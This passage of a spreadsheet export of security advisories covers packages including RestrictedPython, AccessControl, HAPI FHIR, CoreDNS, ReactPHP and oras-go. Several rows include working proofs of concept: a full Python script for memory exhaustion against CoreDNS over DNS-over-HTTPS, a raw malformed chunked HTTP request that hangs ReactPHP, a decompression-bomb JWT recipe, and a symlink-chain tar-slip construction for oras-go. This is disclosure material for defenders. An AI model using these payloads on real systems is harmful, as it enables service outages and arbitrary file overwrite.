`string.Formatter` field resolution methods such as `get_field` can perform attribute and item traversal internally and return live object references. This can bypass RestrictedPython's normal attribute guards and may allow access to sensitive objects such as function globals, builtins, file access, or code execution primitives.
Users are impacted if they run untrusted code with RestrictedPython and expose `string.Formatter`, directly or indirectly, for example through a custom import policy or globals.
### Patches
The problem has been patched by blocking access to `string.Formatter` and unsafe `string.Formatter` traversal methods in `safer_getattr`.
Users should upgrade to the patched release once available. Affected and patched version numbers should be filled in when the release is published.
### Workarounds
Do not expose the standard library `string` module or `string.Formatter` to restricted code.
If a custom import hook is used, deny imports of `string` or provide only a restricted wrapper that does not expose `Formatter`. If custom globals are supplied, ensure neither `string.Formatter` nor `Formatter` instances are available to restricted code.</t>
        </is>
      </c>
      <c r="T83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76825</t>
        </is>
      </c>
    </row>
    <row r="84">
      <c r="A84" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B84" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C84" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77401</t>
        </is>
      </c>
      <c r="D84" s="5" t="inlineStr"/>
      <c r="E84" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F84" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G84" s="5" t="inlineStr"/>
      <c r="H84" s="5" t="inlineStr"/>
      <c r="I84" s="5" t="inlineStr"/>
      <c r="J84" s="5" t="inlineStr"/>
      <c r="K84" s="5" t="inlineStr"/>
      <c r="L84" s="5" t="inlineStr">
        <is>
          <t>pip:AccessControl</t>
        </is>
      </c>
      <c r="M84" s="5" t="inlineStr">
        <is>
          <t>7.4</t>
        </is>
      </c>
      <c r="N84" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O84" s="5" t="inlineStr"/>
      <c r="P84" s="5" t="inlineStr"/>
      <c r="Q84" s="5" t="inlineStr"/>
      <c r="R84" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S84" s="5" t="inlineStr">
        <is>
          <t>### Impact
Python's string `format` functionality allows someone controlling the format string to "read" objects accessible (recursively) via attribute access and subscription from accessible objects. Those attribute accesses and subscriptions use Python's full blown `getattr` and `getitem`, not the policy restricted `AccessControl` variants `_getattr_` and `_getitem_`. This can lead to critical information disclosure.
The `AccessControl` package already guards against direct access to the formatting functions on string instances, but these mitigations did not cover subclasses of `str`.
Affected are all users who allow untrusted users to create AccessControl controlled Python code and execute it.
### Patches
A fix was published with version 7.4.
### Workarounds
There is no workaround.</t>
        </is>
      </c>
      <c r="T84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77401</t>
        </is>
      </c>
    </row>
    <row r="85">
      <c r="A85" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B85" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C85" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81176</t>
        </is>
      </c>
      <c r="D85" s="5" t="inlineStr"/>
      <c r="E85" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F85" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G85" s="5" t="inlineStr"/>
      <c r="H85" s="5" t="inlineStr"/>
      <c r="I85" s="5" t="inlineStr"/>
      <c r="J85" s="5" t="inlineStr"/>
      <c r="K85" s="5" t="inlineStr"/>
      <c r="L85" s="5" t="inlineStr">
        <is>
          <t>npm:devalue</t>
        </is>
      </c>
      <c r="M85" s="5" t="inlineStr">
        <is>
          <t>5.9.2</t>
        </is>
      </c>
      <c r="N85" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O85" s="5" t="inlineStr"/>
      <c r="P85" s="5" t="inlineStr"/>
      <c r="Q85" s="5" t="inlineStr"/>
      <c r="R85" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S85" s="5" t="inlineStr">
        <is>
          <t>### Impact
`devalue.parse` prior to version 5.9.2 fails to reject out-of-bounds indices. Specially-crafted payloads can exploit this to cause devalue to alternate between different array representations, resulting in work that is quadratic with payload size.
Applications are potentially affected if they call `devalue.parse` with untrusted data.
### Patches
The bug is fixed in `devalue@5.9.2`.</t>
        </is>
      </c>
      <c r="T85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81176</t>
        </is>
      </c>
    </row>
    <row r="86">
      <c r="A86" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B86" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C86" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81875</t>
        </is>
      </c>
      <c r="D86" s="5" t="inlineStr"/>
      <c r="E86" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F86" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G86" s="5" t="inlineStr"/>
      <c r="H86" s="5" t="inlineStr"/>
      <c r="I86" s="5" t="inlineStr"/>
      <c r="J86" s="5" t="inlineStr"/>
      <c r="K86" s="5" t="inlineStr"/>
      <c r="L86" s="5" t="inlineStr">
        <is>
          <t>maven:ca.uhn.hapi.fhir:org.hl7.fhir.r5, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation.cli</t>
        </is>
      </c>
      <c r="M86" s="5" t="inlineStr">
        <is>
          <t>6.9.12</t>
        </is>
      </c>
      <c r="N86" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O86" s="5" t="inlineStr"/>
      <c r="P86" s="5" t="inlineStr"/>
      <c r="Q86" s="5" t="inlineStr"/>
      <c r="R86" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-409</t>
        </is>
      </c>
      <c r="S86" s="5" t="inlineStr">
        <is>
          <t>### Summary
`SHCParser` inflates compressed Smart Health Card JWT payloads into memory without a decompressed-size limit. An attacker who can submit SHC content for validation can craft a small compressed JWT payload that expands to a very large byte array, causing memory exhaustion or severe garbage collection pressure.
### Details
The vulnerable code is in `org.hl7.fhir.r5/src/main/java/org/hl7/fhir/r5/elementmodel/SHCParser.java`.
`decodeJWT()` checks `MAX_ALLOWED_SHC_LENGTH`, but this only logs an error and parsing continues:
```java
// SHCParser.java:282-284
if (jwt.length() &gt; MAX_ALLOWED_SHC_LENGTH) {
  logError(...);
}
```
If the header contains `"zip":"DEF"`, the payload is inflated before JSON parsing:
```java
// SHCParser.java:300-304
if ("DEF".equals(res.header.asString("zip"))) {
  payloadJson = inflate(payloadJson);
}
res.payload = JsonParser.parseObject(FileUtilities.bytesToString(payloadJson), true);
```
`inflate()` accumulates all decompressed output in a `ByteArrayOutputStream` and has no maximum output size:
```java
// SHCParser.java:455-468
while (!inflater.finished()) {
  final int count = inflater.inflate(buffer);
  outputStream.write(buffer, 0, count);
}
return outputStream.toByteArray();
```
The same unbounded decompression pattern exists in `decompress()` at `SHCParser.java:410-423`.
### PoC
Create a highly compressible SHC-shaped JSON payload, compress it with raw DEFLATE (`new Deflater(9, true)`), Base64URL-encode it as the JWT payload, and set the JWT header to `{"zip":"DEF"}`.
Local verification measured the following expansion through `SHCParser.inflate()`:
```text
plain=1000066 compressed=1052 inflated=1000066 ratio=950
plain=16000066 compressed=15626 inflated=16000066 ratio=1023
```
A small compressed payload can therefore allocate many megabytes of heap. Larger payloads can trigger `OutOfMemoryError` or process instability.
### Impact
This is a denial-of-service vulnerability. Any validator service or application that accepts attacker-supplied SHC content can be forced to allocate excessive heap memory. Impact ranges from request failure and severe GC pressure to process termination.
### Credits
- Thai Son Dinh from VinSOC Labs (R&amp;D)</t>
        </is>
      </c>
      <c r="T86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81875</t>
        </is>
      </c>
    </row>
    <row r="87">
      <c r="A87" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B87" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C87" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81876</t>
        </is>
      </c>
      <c r="D87" s="5" t="inlineStr"/>
      <c r="E87" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F87" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G87" s="5" t="inlineStr"/>
      <c r="H87" s="5" t="inlineStr"/>
      <c r="I87" s="5" t="inlineStr"/>
      <c r="J87" s="5" t="inlineStr"/>
      <c r="K87" s="5" t="inlineStr"/>
      <c r="L87" s="5" t="inlineStr">
        <is>
          <t>maven:ca.uhn.hapi.fhir:org.hl7.fhir.r5, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation, maven:ca.uhn.hapi.fhir:org.hl7.fhir.validation.cli</t>
        </is>
      </c>
      <c r="M87" s="5" t="inlineStr">
        <is>
          <t>6.9.12</t>
        </is>
      </c>
      <c r="N87" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O87" s="5" t="inlineStr"/>
      <c r="P87" s="5" t="inlineStr"/>
      <c r="Q87" s="5" t="inlineStr"/>
      <c r="R87" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-400, CWE-835</t>
        </is>
      </c>
      <c r="S87" s="5" t="inlineStr">
        <is>
          <t>### Summary
A malformed Smart Health Card (SHC) JWT with `zip: "DEF"` and an empty or truncated DEFLATE payload causes `SHCParser.inflate()` to loop forever. This allows an attacker who can submit SHC content for validation to pin a JVM worker thread indefinitely, causing denial of service.
### Details
The vulnerable code is in `org.hl7.fhir.r5/src/main/java/org/hl7/fhir/r5/elementmodel/SHCParser.java`.
`decodeJWT()` inflates the JWT payload when the header contains `"zip":"DEF"`:
```java
// SHCParser.java:300-302
if ("DEF".equals(res.header.asString("zip"))) {
  payloadJson = inflate(payloadJson);
}
```
`inflate()` loops only on `!inflater.finished()` and does not check `inflater.needsInput()`, `inflater.needsDictionary()`, or zero-progress output:
```java
// SHCParser.java:455-468
while (!inflater.finished()) {
  final int count = inflater.inflate(buffer);
  outputStream.write(buffer, 0, count);
}
```
For empty or truncated raw DEFLATE input, `Inflater.inflate()` returns `0`, `finished()` remains `false`, and `needsInput()` becomes `true`, producing an infinite tight loop. The same unsafe loop pattern also exists in `decompress()` at `SHCParser.java:410-423`.
The validator reaches this path during SHC validation and during file-format detection for SHC-looking input (`ResourceChecker.java:115-118`).
### PoC
Compile the project, then run a minimal local harness that calls:
```java
SHCParser.inflate(new byte[0]);
```
This never returns. Local verification:
```bash
timeout 3s java -cp ... VerifyDoSFindings shcHang
echo $?
# 124 = timeout killed the hung process
```
A JWT PoC uses:
- header: Base64URL(`{"zip":"DEF"}`)
- payload: empty or truncated raw DEFLATE bytes
- signature: arbitrary
Submit the resulting token as SHC content, for example via a `.shc` file or content beginning with `shc:/` that reaches the validator's SHC detection path.
### Impact
This is a denial-of-service vulnerability. A single malformed SHC validation request can consume a worker thread indefinitely. In services that validate uploaded SHC content, a small number of concurrent malformed requests can exhaust all validation workers.
### Credits
- Thai Son Dinh from VinSOC Labs (R&amp;D)</t>
        </is>
      </c>
      <c r="T87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81876</t>
        </is>
      </c>
    </row>
    <row r="88">
      <c r="A88" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B88" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C88" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82399</t>
        </is>
      </c>
      <c r="D88" s="5" t="inlineStr"/>
      <c r="E88" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F88" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G88" s="5" t="inlineStr"/>
      <c r="H88" s="5" t="inlineStr"/>
      <c r="I88" s="5" t="inlineStr"/>
      <c r="J88" s="5" t="inlineStr"/>
      <c r="K88" s="5" t="inlineStr"/>
      <c r="L88" s="5" t="inlineStr">
        <is>
          <t>go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M88" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N88" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O88" s="5" t="inlineStr"/>
      <c r="P88" s="5" t="inlineStr"/>
      <c r="Q88" s="5" t="inlineStr"/>
      <c r="R88" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S88" s="5" t="inlineStr">
        <is>
          <t>### Summary
CoreDNS parses attacker-controlled DNS section counts before validating them on DNS-over-HTTPS (DoH and DoH3), DNS-over-QUIC (DoQ), and DNS-over-gRPC listeners. An unauthenticated client can use DNS name compression to make one
65,533-byte request allocate more than 10 MiB while it is unpacked. Concurrent requests can exhaust memory and terminate CoreDNS.
### Details
The affected request paths call `dns.Msg.Unpack` directly:
- [DoH POST and GET decoding](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/doh/doh.go#L134-L155). DoH3 uses the same decoder.
- [DoQ stream handling](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_quic.go#L212-L219).
- [DNS-over-gRPC query handling](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_grpc.go#L176-L184).
This differs from the [miekg/dns](https://github.com/miekg/dns) UDP and TCP server. Its [`serveDNS`](https://github.com/miekg/dns/blob/v1.1.72/server.go#L628-L643) path decodes the fixed 12-byte header and invokes [`DefaultMsgAcceptFunc`](https://github.com/miekg/dns/blob/v1.1.72/acceptfunc.go#L33-L57) before unpacking the DNS sections. The default policy rejects requests unless `QDCOUNT` is exactly one and also limits the other section counts. CoreDNS's custom transports bypass this early validation.
Parsing happens before the plugin chain. Plugin-level rate limiting or request handling cannot prevent the allocation. The fix is to apply `dns.DefaultMsgAcceptFunc` to the fixed header before calling `Msg.Unpack` in each custom request transport. Response decoding must remain separate because the request policy intentionally rejects response headers.
### PoC
The PoC runs against the DoH server.
Run the following from a clean checkout of CoreDNS v1.14.6. Docker must support container memory limits. The example uses the test certificate already present in the repository and publishes the test service only on loopback.
Save this as `Corefile.cd01`:
```text
https://.:8053 {
    tls /cert.pem /key.pem
    whoami
}
```
Save this standard-library client as `poc-cd01.py`:
```python
#!/usr/bin/env python3
import argparse
import concurrent.futures
from collections import Counter
import http.client
import ssl
import struct
def normal_query():
    header = struct.pack("!HHHHHH", 0x1234, 0x0100, 1, 0, 0, 0)
    question = b"\x07example\x03org\x00" + struct.pack("!HH", 1, 1)
    return header + question, 1
def attack_query():
    message = bytearray(65535)
    offset = 12
    name_offset = offset
    for size in (63, 63, 63, 61):
        message[offset] = size
        offset += 1
        message[offset : offset + size] = b"\x01" * size
        offset += size
    message[offset] = 0
    offset += 1
    struct.pack_into("!HH", message, offset, 1, 1)
    offset += 4
    questions = 1
    while offset + 6 &lt;= len(message):
        struct.pack_into("!HHH", message, offset, 0xC000 | name_offset, 1, 1)
        offset += 6
        questions += 1
    struct.pack_into(
        "!HHHHHH", message, 0, 0x1234, 0x0100, questions, 0, 0, 0
    )
    return bytes(message[:offset]), questions
def send(payload):
    context = ssl._create_unverified_context()
    connection = http.client.HTTPSConnection(
        "127.0.0.1", 18053, timeout=3, context=context
    )
    try:
        connection.request(
            "POST",
            "/dns-query",
            body=payload,
            headers={"Content-Type": "application/dns-message"},
        )
        response = connection.getresponse()
        response.read()
        return f"http-{response.status}"
    except Exception:
        return "error"
    finally:
        connection.close()
def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--normal", action="store_true")
    parser.add_argument("--workers", type=int, default=1)
    args = parser.parse_args()
    payload, questions = normal_query() if args.normal else attack_query()
    print(
        f"payload={len(payload)} questions={questions} workers={args.workers}"
    )
    with concurrent.futures.ThreadPoolExecutor(args.workers) as pool:
        results = pool.map(send, [payload] * args.workers)
    print(Counter(results))
if __name__ == "__main__":
    main()
```
Build the Linux binary and container image:
```sh
GOCACHE=/tmp/coredns-gocache \
GOOS=linux GOARCH="$(go env GOARCH)" CGO_ENABLED=0 \
go build -tags=grpcnotrace -o coredns .
docker build --tag coredns-cd01:vulnerable .
```
Start CoreDNS with a 64 MiB memory and swap limit:
```sh
docker run --detach --name coredns-cd01 \
  --memory 64m --memory-swap 64m \
  --publish 127.0.0.1:18053:8053/tcp \
  --volume "$PWD/Corefile.cd01:/Corefile:ro" \
  --volume "$PWD/plugin/tls/test_cert.pem:/cert.pem:ro" \
  --volume "$PWD/plugin/tls/test_key.pem:/key.pem:ro" \
  coredns-cd01:vulnerable -conf /Corefile
```
Confirm that the listener works and that one malicious request is accepted:
```console
$ python3 poc-cd01.py --normal
payload=29 questions=1 workers=1
Counter({'http-200': 1})
$ python3 poc-cd01.py
payload=65533 questions=10878 workers=1
Counter({'http-200': 1})
```
Send 32 malicious requests concurrently and inspect the container:
```console
$ python3 poc-cd01.py --workers 32
payload=65533 questions=10878 workers=32
Counter({'error': 32})
$ docker inspect --format '{{.State.Status}} OOMKilled={{.State.OOMKilled}} ExitCode={{.State.ExitCode}}' coredns-cd01
exited OOMKilled=true ExitCode=137
```
`OOMKilled=true` confirms that the container was terminated by memory exhaustion rather than a CoreDNS configuration error.
### Impact
This is an unauthenticated denial-of-service vulnerability. Deployments are affected when DoH, DoH3, DoQ, or DNS-over-gRPC is exposed to an attacker. The ordinary miekg/dns UDP and TCP listeners are not affected because they perform the header acceptance check before unpacking.
In the validated configuration, 32 requests OOM-killed a CoreDNS container limited to 64 MiB. Higher memory limits increase the number of concurrent requests required but do not remove the allocation amplification. Successful exploitation interrupts DNS service.
CoreDNS versions v007 through v1.14.6 are affected when DNS-over-gRPC is exposed. DoH is affected from v1.1.3, DoQ from v1.11.0, and DoH3 from v1.13.2.</t>
        </is>
      </c>
      <c r="T88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82399</t>
        </is>
      </c>
    </row>
    <row r="89">
      <c r="A89" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B89" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C89" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84997</t>
        </is>
      </c>
      <c r="D89" s="5" t="inlineStr"/>
      <c r="E89" s="5" t="inlineStr"/>
      <c r="F89" s="5" t="inlineStr"/>
      <c r="G89" s="5" t="inlineStr"/>
      <c r="H89" s="5" t="inlineStr"/>
      <c r="I89" s="5" t="inlineStr"/>
      <c r="J89" s="5" t="inlineStr"/>
      <c r="K89" s="5" t="inlineStr"/>
      <c r="L89" s="5" t="inlineStr">
        <is>
          <t>composer:react/http</t>
        </is>
      </c>
      <c r="M89" s="5" t="inlineStr">
        <is>
          <t>1.11.1</t>
        </is>
      </c>
      <c r="N89" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O89" s="5" t="inlineStr"/>
      <c r="P89" s="5" t="inlineStr"/>
      <c r="Q89" s="5" t="inlineStr"/>
      <c r="R89" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="S89" s="5" t="inlineStr">
        <is>
          <t>### Summary
A malformed HTTP message using `Transfer-Encoding: chunked` can drive `React\Http\Io\ChunkedDecoder` into an infinite loop, pegging a CPU core and freezing the event loop. Because ReactPHP is single-threaded, one such message stalls the entire process for every client until it is killed.
Both directions are affected. `ChunkedDecoder` decodes chunked **request** bodies for `React\Http\HttpServer` and chunked **response** bodies for `React\Http\Browser`, so a server can be attacked by a malicious client and a client can be attacked by a malicious or compromised server.
### Details
`ChunkedDecoder::handleData()` loops `while ($this-&gt;buffer !== '')` and relies on the buffer shrinking each iteration. Two states leave the buffer unchanged while the loop condition stays true.
**Terminal-chunk trailer.** After the terminating `0` chunk, any remaining buffer is treated as trailer data to skip:
```php
} elseif ($this-&gt;chunkSize === 0) {
    $this-&gt;buffer = (string)\substr($this-&gt;buffer, $positionCrlf);
}
```
When the trailer holds no CRLF yet, `strpos()` returns `false`, PHP coerces that to `0` in `substr()`, and the buffer is never advanced. Neither the error guard (which requires a non-zero chunk size) nor the wait guard (which requires fewer than two bytes remaining) can fire, so the loop re-enters with identical state.
**Off-by-one after a completed chunk.** Once a non-terminal chunk has been fully transferred, the "chunk does not end with a CRLF" error guard requires `strlen($this-&gt;buffer) &gt; 2` while the wait guard requires `&lt; 2`. Exactly two non-CRLF bytes slip past both, and because the chunk is already complete nothing is consumed on the next iteration.
### PoC
Run the example server from the `reactphp/reactphp` README and send a malformed request. Note the missing trailing `\r\n`:
```
POST / HTTP/1.1\r\nHost: x\r\nTransfer-Encoding: chunked\r\n\r\n0\r\nab
```
The PHP process pegs at 100% CPU and stops answering legitimate requests. A body of `1\r\nAAB` triggers the second state.
The client side is reachable the same way: a `Browser` request to a server that answers with `Transfer-Encoding: chunked` and either malformed body shape hangs the client process.
### Impact
Denial of service. The affected process stops responding entirely and has to be killed.
Servers behind a reverse proxy that parses and re-frames HTTP, such as a typical nginx setup, are not affected on the **server** side, because the proxy normalises the request before it reaches PHP. That mitigation does not extend to the **client** side: outbound requests made with `Browser` reach the remote server directly, so an application fetching attacker-influenced URLs is affected regardless of what sits in front of it.</t>
        </is>
      </c>
      <c r="T89" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84997</t>
        </is>
      </c>
    </row>
    <row r="90">
      <c r="A90" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B90" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C90" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85731</t>
        </is>
      </c>
      <c r="D90" s="5" t="inlineStr"/>
      <c r="E90" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F90" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G90" s="5" t="inlineStr"/>
      <c r="H90" s="5" t="inlineStr"/>
      <c r="I90" s="5" t="inlineStr"/>
      <c r="J90" s="5" t="inlineStr"/>
      <c r="K90" s="5" t="inlineStr"/>
      <c r="L90" s="5" t="inlineStr">
        <is>
          <t>go:oras.land/oras-go/v2</t>
        </is>
      </c>
      <c r="M90" s="5" t="inlineStr">
        <is>
          <t>2.6.2</t>
        </is>
      </c>
      <c r="N90" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O90" s="5" t="inlineStr"/>
      <c r="P90" s="5" t="inlineStr"/>
      <c r="Q90" s="5" t="inlineStr"/>
      <c r="R90" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="S90" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `content/file.Store` in oras-go v2 unpacks OCI layer tarballs when a descriptor carries `io.deis.oras.content.unpack=true`. The extraction routine validates symlink targets purely lexically (`filepath.Join`) and, for regular files placed directly at the extraction root, skips the parent-symlink `Lstat` walk. A malicious tarball can plant a chain of symlinks whose lexical target stays inside the extraction root but whose kernel-resolved target is any absolute path, then write through it with a follow-up regular-file entry. The result is arbitrary file create/overwrite outside the store's working directory under the default `AllowPathTraversalOnWrite=false` configuration — a canonical tar-slip → RCE primitive.
### Details
**Affected versions:** `&lt;= v2.6.1`
**Entry point:** `content/file/file.go` line 486, `(*Store).pushDir` — reached from `(*Store).Push` for any descriptor whose annotations include `io.deis.oras.content.unpack: "true"` (i.e. `file.AnnotationUnpack`) and an `org.opencontainers.image.title`. `oras.Copy` from a remote registry into a `file.New(dir)` store invokes this per layer.
**Root cause 1 — lexical link validation.** `content/file/utils.go` lines 264–275, `ensureLinkPath`:
```go
func ensureLinkPath(baseAbs, baseRel, link, target string) (string, error) {
        // resolve link
        path := target
        if !filepath.IsAbs(target) {
                path = filepath.Join(filepath.Dir(link), target)
        }
        // ensure path is under baseAbs or baseRel
        if _, err := resolveRelToBase(baseAbs, baseRel, path); err != nil {
                return "", err
        }
        return target, nil
}
```
`filepath.Join` cleans `..` components textually and does **not** dereference symlinks in intermediate components. It therefore cannot detect that a component of `target` is itself a previously-extracted symlink that the kernel will follow before applying subsequent `..` components.
**Root cause 2 — parent-symlink check skipped for root-level entries.** `content/file/utils.go` lines 247–257, inside `resolveRelToBase`:
```go
// No symbolic link allowed in the relative path
dir := filepath.Dir(path)
for dir != "." {
        if info, err := os.Lstat(filepath.Join(baseAbs, dir)); err != nil {
                ...
        } else if info.Mode()&amp;os.ModeSymlink != 0 {
                return "", fmt.Errorf("no symbolic link allowed between %q and %q", baseRel, target)
        }
        dir = filepath.Dir(dir)
}
```
For an entry named `&lt;title&gt;/escape`, `path == "escape"` and `filepath.Dir("escape") == "."`, so the loop body never executes — the entry itself is never `Lstat`-checked.
**Root cause 3 — write follows symlinks.** `content/file/utils.go` line 279, `writeFile`:
```go
file, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, perm)
```
No `O_NOFOLLOW`, so if `path` is a symlink the write goes to its target.
**Data flow / exploit construction.** Let `baseAbs = &lt;workingDir&gt;/&lt;title&gt;` and `N = depth(baseAbs)` (number of path components from `/`). The attacker's tar.gz contains, in order:
1. `N` nested directories `&lt;title&gt;/d0/d1/…/d{N-1}`.
2. A symlink `&lt;title&gt;/d0/…/d{N-1}/up` → `"../../…"` (`N` levels). Both lexically and on disk this resolves to `baseAbs`, so `ensureLinkPath` accepts it and `resolveRelToBase` sees only real directories in its ancestry.
3. A symlink `&lt;title&gt;/escape` → `"d0/…/d{N-1}/up/../../…/&lt;absTarget&gt;"` (`N` `..` components after `up`). **Lexically**, `filepath.Join(baseAbs, "d0/…/up/../…/&lt;absTarget&gt;")` cancels the `N` `..` against `up` plus `d{N-2}…d0`, yielding `baseAbs/d0/&lt;absTarget&gt;` — inside the root, so `ensureLinkPath` accepts it. `resolveRelToBase` then walks `d0/&lt;absTarget-parents&gt;`, none of which are symlinks (they don't exist), so the link is created. **At the kernel**, resolving `baseAbs/d0/…/up` first follows `up` back to `baseAbs`, and the remaining `N` `..` components climb from `baseAbs` to `/`, then `&lt;absTarget&gt;` is appended — the symlink points at the attacker-chosen absolute path.
4. A regular file `&lt;title&gt;/escape` (same name). `resolveRelToBase("escape")` yields `dir == "."` (root cause 2), so no `Lstat` is performed. `extractTarDirectory` (line 181) calls `writeFile` which opens `baseAbs/escape` with `O_TRUNC` and no `O_NOFOLLOW` (root cause 3), writing the attacker's payload through the symlink to `&lt;absTarget&gt;`.
**Why v2.6.1's `checkSymlinkEscape` does not help.** The fix for GHSA-8xwf-rjm4-xvhv added a symlink-resolving containment check, but it is called only from `resolveWritePath` (`content/file/file.go` line 632) on the **`pushFile`** path. `pushDir` → `extractTarGzip` → `extractTarDirectory` never calls it; `content/file/utils.go` is byte-identical between v2.6.0 and v2.6.1.
**Suggested remediation.** Any of: (a) `Lstat` the final path component before opening for write and reject symlinks; (b) open with `O_NOFOLLOW` (or `O_EXCL` for new files); (c) resolve link targets with `filepath.EvalSymlinks` on the deepest existing ancestor (as `checkSymlinkEscape` already does) instead of lexical `filepath.Join`; (d) extract into a fresh empty directory and use `openat2(RESOLVE_BENEATH)` / `os.Root` (Go 1.24+) for all filesystem operations.
### PoC
```
go mod init poc
go get oras.land/oras-go/v2@v2.6.1
go run .
```
```go
// Arbitrary file write outside a default-configured file.Store via
// symlink-chain bypass in content/file.extractTarDirectory.
//
// ensureLinkPath() validates symlink targets purely lexically with
// filepath.Join, which collapses ".." textually and does not follow
// intermediate symlink components. By first planting a deep "up" symlink
// that legitimately resolves to the extraction root, an "escape" symlink
// can be crafted whose lexical target stays in-bounds but whose
// kernel-resolved target is any absolute path. A follow-up TypeReg entry
// with the same name is opened with O_CREATE|O_TRUNC (no O_NOFOLLOW),
// writing through the symlink.
//
// Realistic trigger: oras.Copy() from an untrusted registry into a
// file.New() store. The attacker controls the manifest (sets
// AnnotationTitle + AnnotationUnpack=true on a layer) and the layer blob.
// All digests are honest, so content verification passes.
package main
import (
        "archive/tar"
        "bytes"
        "compress/gzip"
        "context"
        _ "crypto/sha256"
        "fmt"
        "os"
        "path/filepath"
        "strings"
        "github.com/opencontainers/go-digest"
        ocispec "github.com/opencontainers/image-spec/specs-go/v1"
        "oras.land/oras-go/v2/content/file"
)
func main() {
        if err := run(); err != nil {
                fmt.Println("ERROR:", err)
                os.Exit(1)
        }
}
func run() error {
        ctx := context.Background()
        // Victim's working directory for the file store.
        workDir, err := os.MkdirTemp("", "oras-victim-*")
        if err != nil {
                return err
        }
        defer os.RemoveAll(workDir)
